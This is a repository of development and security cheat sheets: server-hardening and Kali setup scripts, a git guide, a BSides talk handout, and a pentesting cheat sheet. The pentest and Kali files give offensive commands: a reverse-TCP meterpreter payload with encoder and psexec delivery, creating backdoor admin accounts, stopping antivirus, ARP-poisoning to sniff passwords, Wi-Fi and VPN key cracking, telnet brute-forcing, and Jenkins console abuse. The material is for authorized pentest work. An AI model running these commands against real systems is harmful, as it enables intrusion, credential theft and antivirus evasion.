├── LICENSE ├── README.md ├── do_prep.sh ├── git.md ├── kali-lhf.md ├── kali_docker_ec2_install.md ├── kali_light_rolling_vbox.sh ├── kali_light_vbox.sh ├── kali_prep.sh ├── pentest.md └── pre-commit-hooks.sh /LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2014, LCI Technology Group, LLC 2 | All rights reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without 5 | modification, are permitted provided that the following conditions are met: 6 | 7 | * Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | * Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation 12 | and/or other materials provided with the distribution. 13 | 14 | * Neither the name of LCI Technology Group, LLC nor the names of its 15 | contributors may be used to endorse or promote products derived from 16 | this software without specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 19 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 20 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 22 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 23 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 24 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 25 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 26 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 27 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 28 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | cheat-sheets 2 | ============ 3 | 4 | Various Cheat Sheets related to development and security 5 | -------------------------------------------------------------------------------- /do_prep.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Copyright (c) 2014, LCI Technology Group, LLC 4 | # All rights reserved. 5 | # See LICENSE file for details. 6 | 7 | #----------------------------------------------------------------------------- 8 | # 9 | # Script to prepare a new DigitalOcean Ubuntu or Debian install for first use. 10 | # The script will do the following: 11 | # * Update the software 12 | # * Move the SSH server to a new port 13 | # * Disable password logins for SSH 14 | # * Configure iptables to block all incoming traffic except SSH 15 | # * Configure iptables to run at boot 16 | # * Create a new low-privilege user with sudo access. 17 | # * Copy the authorized key file for root to the new user. 18 | # 19 | # The script assumes you are using an SSH key for root login. If you are 20 | # not the script may break your access to the server. Also, you really should 21 | # be using SSH keys for all SSH access. 22 | # 23 | # After creating your DigitalOcean server, scp this file to the server, give 24 | # it execute permissions with chmod +x do_prep.sh, and run it as root. When 25 | # the script is complete, reboot the server. Once the server is back online 26 | # you should be able to login with your low-privileged user account. 27 | # 28 | # Usage: 29 | # ./do_prep.sh username ssh_port 30 | #----------------------------------------------------------------------------- 31 | 32 | if [ "$#" -ne 2 ]; then 33 | echo "Usage: $0 username ssh_port" >&2 34 | exit 1 35 | fi 36 | 37 | # Update the server 38 | echo "Updating the server." 39 | apt-get update 40 | apt-get -y upgrade 41 | apt-get -y autoremove 42 | 43 | # Update the SSH configuration 44 | echo "Reconfiguring SSH." 45 | sed "s/Port 22/Port $2/" < /etc/ssh/sshd_config > /tmp/sshd_config 46 | cp /tmp/sshd_config /etc/ssh/sshd_config 47 | sed "s/#PasswordAuthentication yes/PasswordAuthentication no/" < /etc/ssh/sshd_config > /tmp/sshd_config 48 | cp /tmp/sshd_config /etc/ssh/sshd_config 49 | service ssh restart 50 | 51 | # Add the firewall rules 52 | echo "Adding new firewall rules." 53 | iptables -A INPUT -i eth0 -p tcp --dport $2 -m state --state NEW,ESTABLISHED -j ACCEPT 54 | iptables -A INPUT -i eth0 -p tcp -m state --state ESTABLISHED -j ACCEPT 55 | iptables -A INPUT -i eth0 -p udp --sport 53 -j ACCEPT 56 | iptables -A INPUT -i lo -j ACCEPT 57 | iptables -P INPUT DROP 58 | iptables -P OUTPUT ACCEPT 59 | iptables -P FORWARD DROP 60 | 61 | # Configure iptables to start on boot 62 | echo "Configuring firewall to start on boot." 63 | iptables-save >> /etc/firewall.conf 64 | touch /etc/network/if-up.d/iptables 65 | chmod +x /etc/network/if-up.d/iptables 66 | echo '#!/bin/sh' > /etc/network/if-up.d/iptables 67 | echo 'iptables-restore < /etc/firewall.conf' >> /etc/network/if-up.d/iptables 68 | 69 | # Add a new low-privileged user account 70 | echo "Adding new low-privileged user account." 71 | ssh-keygen -f user -N "" 72 | pass=$(head -c 12 /dev/urandom | base64) 73 | useradd -d /home/$1 -m -G sudo -s /bin/bash $1 74 | echo $1:$pass | chpasswd 75 | mkdir /home/$1/.ssh 76 | mv user.pub /home/$1/.ssh/authorized_keys 77 | chown -R $1:$1 /home/$1/.ssh 78 | 79 | echo "User account $1 created with password $pass." 80 | -------------------------------------------------------------------------------- /git.md: -------------------------------------------------------------------------------- 1 | Git Cheat Sheet 2 | =============== 3 | Basic Workflow 4 | -------------- 5 | 1. Create a new project. 6 | 2. Develop code: 7 | * For small code edits like adding a comment or fixing a typo, I make the changes directly on Master. 8 | * For features, I create a new branch for that feature and do all the work on that branch. 9 | * After creating the branch, I add the branch to the upstream server. 10 | * While developing on the branch I make sure that I am making regular commits and pushing the changes to the upstream server. 11 | * Once a feature is complete and tested, I merge that branch back into Master and delete the branch. 12 | * While working on a particular feature, if you need to get changes from Master into your feature branch, then rebase. 13 | 3. Once your Master branch is ready for distribution, create a tag with the version number of the distribution. Then create an archive from that tag and distribute that file. 14 | 4. Continue to develop code and then tag and distribute that code. 15 | 16 | 17 | Branches 18 | -------- 19 | * Create a new branch: `git checkout -b ` 20 | * Move to a branch: `git checkout ` 21 | * Add a branch to upstream server: `git push --set-upstream origin ` 22 | * Push a branch: `git push -u origin ` 23 | * Merge two branches: `git merge ` 24 | * Delete a branch: `git branch -d ` 25 | * Update a branch with changes in master (Rebase): `git checkout ; git rebase master` 26 | 27 | 28 | Tags 29 | ---- 30 | * Create a new tag for version 1.4.0: `git tag -a v1.4.0 -m "Some Message."` 31 | * View all tags: `git tag -n` 32 | * Delete the tag for version 1.4.0: `git tag -d v1.4.0` 33 | * Push the tags: `git push --tags` 34 | 35 | 36 | Create Archive From Tag 37 | ----------------------- 38 | * Create an archive for version 1.4.0 (Option 1): `git archive --prefix=-1.4.0/ -o -1.4.0.tar.gz v1.4.0` 39 | * Create an archive for version 1.4.0 (Option 2): `git archive --format=tar.gz --prefix=-1.4.0/ v1.4.0 > -1.4.0.tar.gz` 40 | 41 | 42 | View Commits Between Tags 43 | ------------------------- 44 | * Commits between two tags: `git log --pretty=format:%s Tag1..Tag2` 45 | * Commits between tag and HEAD: `git log --pretty=format:%s Tag..HEAD` 46 | -------------------------------------------------------------------------------- /kali-lhf.md: -------------------------------------------------------------------------------- 1 | Finding Low Hanging Fruit with Kali 2 | =================================== 3 | This cheat sheet was developed to accompany the talk Finding Low Hanging Fruit with Kali, which was presented at [Bsides Nashville](http://bsidesnash.org/) in April 2015. 4 | 5 | How to Get Kali 6 | --------------- 7 | Kali is available for download at http://kali.org/downloads 8 | 9 | Setup Kali for First Use 10 | ------------------------ 11 | Run `apt-get update` to get the latest package lists. 12 | 13 | Run `apt-get upgrade` to install the latest packages. 14 | 15 | Some packages may be held back, install those packages using `apt-get dist-upgrade` or `apt-get install `. 16 | 17 | Use `apt-get autoremove` to remove packages that are no longer needed. 18 | 19 | Setup Metasploit for First Use 20 | ------------------------------ 21 | Start the Postgres and Metasploit services 22 | 23 | service postgresql start 24 | service metasploit start 25 | 26 | To have the Postgres and Metasploit services start up at boot time. 27 | 28 | update-rc.d postgresql enable 29 | update-rc.d metasploit enable 30 | 31 | Unnecessary Services 32 | -------------------- 33 | TCP scan against 10.1.1.4-254 34 | 35 | nmap 10.1.1.4-254 36 | 37 | UDP scan of top ten ports against 10.1.1.4-254 38 | 39 | nmap -sU --top-ports 10 10.1.1.4-254 40 | 41 | Use the --open switch to show only the open ports. 42 | 43 | nmap --top-ports 10 --open 10.1.1.4-254 44 | 45 | Aggressive scan against 10.1.1.4-254 and save to an XML file. 46 | 47 | nmap -A -oX local_network.xml 10.1.1.4-254 48 | 49 | Import the scan results into Metasploit 50 | 51 | msfconsole 52 | db_import local_network.xml 53 | hosts 54 | services 55 | services -p 23 56 | 57 | Finding Weak Passwords 58 | ---------------------- 59 | Look at the wordlists in the wordlists folder 60 | 61 | cd /usr/share/wordlists 62 | ls 63 | gunzip rockyou.txt.gz 64 | 65 | Brute-force the Telnet service on Metasploitable 66 | 67 | use auxiliary/scanner/telnet/telnet_login 68 | show options 69 | set USERNAME msfadmin 70 | set PASS_FILE /usr/share/wordlists/fasttrack.txt 71 | set USER_AS_PASS true 72 | set BLANK_PASSWORDS true 73 | services -p 23 -R 74 | run 75 | 76 | Exploitable Vulnerabilities 77 | --------------------------- 78 | Find heartbleed vulnerabilities 79 | 80 | nmap -p 443 --script=ssl-heartbleed 10.1.1.4-254 81 | 82 | Find SMB vulnerabilities 83 | 84 | nmap --script=smb-check-vulns 10.1.1.4-254 # Unsafe warning 85 | nmap --script=smb-check-vulns --script-args=unsafe=1 10.1.1.4-254 86 | 87 | Web-Based Admin Interfaces 88 | -------------------------- 89 | Find the Jenkins interface 90 | 91 | nmap -A -p 80,443,5800,8000,8080 10.1.1.4-254 92 | 93 | Once we find Jenkins go to the admin interface and look for the script console. 94 | 95 | proc = [‘cat’, ‘/etc/passwd’].execute() 96 | println proc.in.text 97 | 98 | Metasploit also has a module for this. 99 | 100 | use exploit/multi/http/jenkins_script_console 101 | show options 102 | set RHOST 10.1.1.7 103 | set RPORT 8080 104 | set TARGETURI / 105 | show targets 106 | set TARGET 1 107 | exploit 108 | 109 | Metasploit has a lot of exploits for web interfaces 110 | 111 | search /http/ 112 | 113 | Online Resources 114 | ---------------- 115 | [Metasploit Unleashed](http://www.offensive-security.com/metasploit-unleashed/Main_Page) 116 | [Nmap Tutorial](http://www.cyberciti.biz/networking/nmap-command-examples-tutorials/) 117 | -------------------------------------------------------------------------------- /kali_docker_ec2_install.md: -------------------------------------------------------------------------------- 1 | Kali Rolling In Docker on EC2 2 | ============================= 3 | Create a new Instance 4 | --------------------- 5 | 1. Build a new Ubuntu 14.04 instance that has t2.medium specs or higher. 6 | 2. Configure the root drive to be 40GB. 7 | 3. Configure the Security Group and SSH key to match your normal settings. 8 | 9 | 10 | Install Docker and Kali 11 | ----------------------- 12 | 1. Copy the docker_kali_setup.sh script (below) to the new instance and run the script. This will update the server, install docker, and download a full Kali docker image. This will take a while. 13 | 14 | `sudo sh docker_kali_setup.sh` 15 | 16 | 2. When you want to run a Kali command start a new root shell in docker and execute the command. 17 | 18 | `sudo docker run -t -i kali ` 19 | 20 | 3. If you will be running services, such as metasploit, inside the docker container then you need to start docker with the following command. 21 | 22 | `sudo docker run --net=host -t -i kali /bin/bash` 23 | 24 | 4. If you would like to save any changes you've made to the container run the commit command after exiting. 25 | 26 | `sudo docker commit $(sudo docker ps -lq) kali` 27 | 28 | 29 | Docker Kali Setup Script 30 | ------------------------ 31 | ``` 32 | #!/bin/bash 33 | 34 | # Apply the latest updates to the box first. 35 | sudo apt-get update 36 | sudo apt-get -y upgrade 37 | 38 | # Configure the Docker APT key and repos. 39 | sudo apt-get install apt-transport-https ca-certificates 40 | sudo apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D 41 | sudo sh -c 'echo "deb https://apt.dockerproject.org/repo ubuntu-trusty main" > /etc/apt/sources.list.d/docker.list' 42 | sudo apt-get update 43 | 44 | # Install and start docker 45 | sudo apt-get -y install linux-image-extra-$(uname -r) apparmor docker-engine 46 | sudo service docker start 47 | 48 | # Install Kali Top 10 Metapackage 49 | sudo docker pull kalilinux/kali-linux-docker 50 | sudo docker run kalilinux/kali-linux-docker sh -c 'echo "deb http://archive-2.kali.org/kali kali-rolling main non-free contrib" > /etc/apt/sources.list; apt-get update; apt-get -y install kali-linux-top10' 51 | sudo docker commit $(sudo docker ps -lq) kali:v1 52 | 53 | echo "To access the Kali server run 'sudo docker run -it kali:v1 /bin/bash'." 54 | echo "To save changes to the server run 'sudo docker commit $(sudo docker ps -lq) kali:vN', where N is a number" 55 | echo "To run the saved server use 'sudo docker run -it kali:vN /bin/bash'." 56 | ``` 57 | 58 | Sources 59 | ------- 60 | * https://docs.docker.com/engine/installation/linux/ubuntulinux/ 61 | * https://www.kali.org/news/official-kali-linux-docker-images/ 62 | -------------------------------------------------------------------------------- /kali_light_rolling_vbox.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #---------------------------------------------------------------------------- 4 | # The Kali light distro is a minimal install that requires some extra steps 5 | # to run it well in VirtualBox and to install the basic pentesting tools. 6 | # This script will do the following: 7 | # 8 | # * Install the VirtualBox Guest Additions package from the OS. 9 | # * Install the Kali top 10 tools and set a random password on the MySQL 10 | # database. 11 | # * Configure PostgreSQL to start on boot 12 | # * Initialize the MSF database 13 | # 14 | #----------------------------------------------------------------------------- 15 | echo "Updating packages" 16 | apt-get update 17 | apt-get -q -y upgrade 18 | 19 | echo "Installing Kali top 10 tools." 20 | pass=$(head -c 24 /dev/urandom | base64) 21 | echo "mysql-server-5.6 mysql-server/root_password_again password $pass" | debconf-set-selections 22 | echo "mysql-server-5.6 mysql-server/root_password password $pass" | debconf-set-selections 23 | echo "wireshark-common wireshark-common/install-setuid boolean false" | debconf-set-selections 24 | apt-get -q -y install kali-linux-top10 seclists 25 | 26 | echo "Configuring Metasploit Database" 27 | /etc/init.d/postgresql start 28 | update-rc.d postgresql enable 29 | msfdb init 30 | 31 | echo "Installing VirtualBox Guest Additions" 32 | apt-get -q -y install linux-image-amd64 virtualbox-guest-x11 33 | 34 | echo "MySQL Root Password: $pass" 35 | echo "Please reboot." 36 | -------------------------------------------------------------------------------- /kali_light_vbox.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #---------------------------------------------------------------------------- 4 | # The Kali light distro is a minimal install that requires some extra steps 5 | # to run it well in VirtualBox and to install the basic pentesting tools. 6 | # This script will do the following: 7 | # 8 | # * Install packages needed to build the VirtualBox Guest Additions 9 | # * Install the VirtualBox Guest Additions 10 | # * Install the Kali top 10 tools and set a random password on the MySQL 11 | # database. 12 | # * Configure PostgreSQL to start on boot 13 | # * Initialize the MSF database 14 | # 15 | # Prior to running this script, insert the VirtualBox Guest Additions CD 16 | #----------------------------------------------------------------------------- 17 | echo "Updating packages" 18 | apt-get update 19 | apt-get -q -y upgrade 20 | 21 | echo "Installing build tools and headers." 22 | apt-get -q -y install build-essential linux-headers-$(uname -r) 23 | 24 | echo "Installing the VirtualBox Guest Additions." 25 | mount /media/cdrom 26 | if [ ! -f "/media/cdrom/VBoxLinuxAdditions.run" ]; then 27 | echo "VirtualBox Guest Additions CD not mounted, skipping." 28 | else 29 | /bin/bash /media/cdrom/VBoxLinuxAdditions.run 30 | umount /media/cdrom 31 | eject /media/cdrom 32 | fi 33 | 34 | echo "Installing Kali top 10 tools." 35 | pass=$(head -c 24 /dev/urandom | base64) 36 | echo "mysql-server-5.5 mysql-server/root_password_again password $pass" | debconf-set-selections 37 | echo "mysql-server-5.5 mysql-server/root_password password $pass" | debconf-set-selections 38 | echo "wireshark-common wireshark-common/install-setuid boolean false" | debconf-set-selections 39 | apt-get -q -y install kali-linux-top10 seclists 40 | 41 | echo "Configuring Metasploit Database" 42 | /etc/init.d/postgresql start 43 | update-rc.d postgresql enable 44 | msfdb init 45 | 46 | echo "MySQL Root Password: $pass" 47 | echo "Please reboot." 48 | -------------------------------------------------------------------------------- /kali_prep.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Copyright (c) 2015, LCI Technology Group, LLC 4 | # All rights reserved. 5 | # See LICENSE file for details. 6 | 7 | #----------------------------------------------------------------------------- 8 | # 9 | # Script to prepare a new Kali install for first use. 10 | # The script will do the following: 11 | # * Update the software 12 | # * Start the postgresql and metasploit services 13 | # * Configure the postgresql and metasploit services to start on boot 14 | # 15 | # Usage: 16 | # ./kali_prep.sh 17 | #----------------------------------------------------------------------------- 18 | 19 | # Update the server 20 | echo "Updating the server." 21 | apt-get update 22 | apt-get -y upgrade 23 | apt-get -y autoremove 24 | 25 | # Starting Postgres and Metasploit services 26 | echo "Starting services." 27 | service postgresql start 28 | service metasploit start 29 | 30 | # Configure services to start on boot. 31 | echo "Configure services to start on boot." 32 | update-rc.d postgresql enable 33 | update-rc.d metasploit enable 34 | 35 | -------------------------------------------------------------------------------- /pentest.md: -------------------------------------------------------------------------------- 1 | Pentesting Cheat Sheet 2 | ====================== 3 | These are various tips and tricks I have found useful on my pentest engagements. Most of these can be found using Google but I decided to put them in a central location to make them easily accessible. Hope they are as helpful to you as they are to me. 4 | 5 | Mounting Shares 6 | --------------- 7 | To mount an SMB share using a null session do one of the following depending on 8 | the OS you are using. 9 | 10 | Windows> net use x: \\server\share "" /u: 11 | Linux> mount -t cifs //server/share -o username=,password= /mnt/point 12 | 13 | To mount an NFS share on Linux use. 14 | 15 | mount -t nfs server:/share /mnt/point 16 | 17 | Administrative Accounts 18 | ----------------------- 19 | Add a new Windows domain admin account. 20 | 21 | net user username password /ADD /DOMAIN 22 | net group "Domain Admins" username /ADD /DOMAIN 23 | 24 | Add a new Windows local admin account. 25 | 26 | net user username password /ADD 27 | net localgroup Administrators username /ADD 28 | 29 | Add a new linux account and put them in the wheel group. 30 | 31 | useradd -G wheel username && echo "username:newpass"|chpasswd 32 | 33 | Meterpreter Shell Error 34 | ----------------------- 35 | If you get the error, "stdapi_sys_process_execute: Operation failed: 1314", 36 | while trying to drop to as shell in meterpreter, try the code below. This is 37 | a known bug in meterpreter. 38 | 39 | execute -f cmd.exe -c -i -H 40 | 41 | Metasploit: Custom Psexec Executable 42 | ------------------------------------ 43 | The first thing we need to do is generate a custom executable to use with Meterpreter. 44 | 45 | msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exe 46 | 47 | Next we need to setup a multi handler to listen for connections. 48 | 49 | msf > use exploit/multi/handler 50 | msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp 51 | PAYLOAD => windows/meterpreter/reverse_tcp 52 | msf exploit(handler) > set LHOST 192.168.0.1 53 | LHOST => 192.168.0.1 54 | msf exploit(handler) > set LPORT 4445 55 | LPORT => 4445 56 | [*] Started reverse handler on 192.168.0.1:4445 57 | [*] Starting the payload handler... 58 | 59 | In another msfconsole session we need to configure the psexec exploit module to use our custom executable. 60 | 61 | msf > use exploit/windows/smb/psexec 62 | msf exploit(psexec) > set RHOST 192.168.0.2 63 | RHOST => 192.168.0.2 64 | msf exploit(psexec) > set SMBUser user 65 | SMBUser => user 66 | msf exploit(psexec) > set SMBPass pass 67 | SMBPass => pass 68 | msf exploit(psexec) > set EXE::Custom /path/to/custom.exe 69 | EXE::Custom => /path/to/custom.exe 70 | 71 | Finally, we need to run the exploit. If everything worked then you should see a new meterpreter session open in multi/handler 72 | 73 | msf exploit(psexec) > exploit 74 | 75 | Disable Antivirus 76 | ----------------- 77 | This command will disable Symantec Endpoint Protection. I find it useful when 78 | I have a basic shell on a box and want to upgrade to Meterpreter but Symantec 79 | stops me. 80 | 81 | c:\program files\symantec\symantec endpoint protection\smc -stop 82 | 83 | Use Ettercap to Sniff Traffic 84 | ----------------------------- 85 | Ettercap allows us to do arp poisoning and sniff plaintext passwords. 86 | 87 | ettercap -M arp -T -q -i interface /spoof_ip/ /target_ips/ -w output_file.pcap 88 | 89 | Cracking WPA/WPA2 PSK 90 | --------------------- 91 | Use JtR to generate candidate passwords for aircrack-ng 92 | 93 | john --incremental:all --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w - capture_file.cap 94 | 95 | Use Hashcat to generate candidate passwords for aircrack-ng 96 | 97 | ./hashcat-cli32.bin wordlist -r rules/d3ad0ne.rule --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w - capture_file.cap 98 | 99 | Cracking IPSec Agressive Mode Pre-Shared Key 100 | -------------------------------------------- 101 | If you’ve never done this, read these first. 102 | http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide 103 | http://carnal0wnage.attackresearch.com/2011/12/aggressive-mode-vpn-ike-scan-psk-crack.html 104 | 105 | To find aggressive mode VPNS use ike-scan. 106 | 107 | ike-scan -A 192.168.1.0/24 108 | 109 | If the default transforms don't work use the generate_transforms.sh script from the user guide above. 110 | 111 | generate-transforms.sh | xargs --max-lines=8 ike-scan 10.0.0.0/24 112 | 113 | If you find a SonicWALL VPN using agressive mode it will require a group id, the default group id is GroupVPN 114 | 115 | ike-scan 192.168.1.1 -A -id GroupVPN 116 | 117 | Use the -P argument to save the handshake to a file, which can be used by psk-crack. 118 | 119 | ike-scan 192.168.1.1 -A -Ppsk_192.168.1.1.txt 120 | 121 | Use a dictionary to crack the pre-shared key. 122 | 123 | psk-crack -d /path/to/dictionary psk_192.168.1.1.txt 124 | 125 | Basic Scanning with Nmap 126 | ------------------------ 127 | Discovery Scans: 128 | 129 | nmap -v -n -PE 130 | nmap -v -n -PE -PO -PM -PP 131 | nmap -v -n -PS21-23,25,53,80,443,3389 -PO -PE -PM -PP 132 | 133 | Detailed TCP Scans: 134 | 135 | nmap -v -sS -A --top-ports 10 -oA filename 136 | nmap -v -sS -A -F -oA filename 137 | nmap -v -sS -A -oA filename 138 | nmap -v -sS -A -p 1-65535 -oA filename 139 | 140 | Detailed UDP Scans: 141 | 142 | nmap -v -sU -A --top-ports 10 -oA filename 143 | nmap -v -sU -A -F -oA filename 144 | nmap -v -sU -A -oA filename 145 | nmap -v -sU -A -p 1-65535 -oA filename 146 | 147 | 148 | Create an IP List with Nmap 149 | --------------------------- 150 | I find this particularly useful for tools or scripts that operate on new line delimited list of IP addresses. I can use the simple Nmap syntax to create a file with the list of appropriate IPs. 151 | 152 | nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt 153 | 154 | Crack Passwords with John and Korelogic Rules 155 | --------------------------------------------- 156 | At one point Korelogic released a set of John the Ripper rules in a john.conf file. This bash one liner would grab each ruleset and run JtR with the specified ruleset. 157 | 158 | for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} -w: ; done 159 | 160 | Unquoted Service Paths 161 | ---------------------- 162 | Identify unquoted service paths that may be useful for privilege escalation. 163 | 164 | wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ 165 | 166 | https://www.commonexploits.com/unquoted-service-paths/ 167 | -------------------------------------------------------------------------------- /pre-commit-hooks.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | echo "Checking formatting..." 4 | if [ "$(gofmt -w -l . | wc -l)" -gt 0 ]; then 5 | echo "Please run go fmt" 6 | exit 1 7 | fi 8 | 9 | echo "Checking tests..." 10 | go test 11 | --------------------------------------------------------------------------------